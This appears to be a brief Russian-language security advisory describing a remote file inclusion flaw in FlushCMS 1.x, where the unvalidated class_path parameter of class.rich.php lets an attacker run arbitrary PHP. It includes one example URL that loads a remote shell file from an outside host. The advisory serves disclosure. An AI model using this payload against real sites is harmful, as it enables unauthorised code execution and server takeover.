Программа: FlushCMS 1.x

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP код на целевой системе. Данные, переданные в параметре class_path скрипта class.rich.php не проверяются, в результате атакующий может подключить произвольный локальный или внешний файл. Для работы требуется что бы опция "register_globals" была включена.

Пример:

http://www.site.com/flushcmd/Include/editor/rich_files/ class.rich.php?class_path=http://www.shell.com/shell.txt?

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии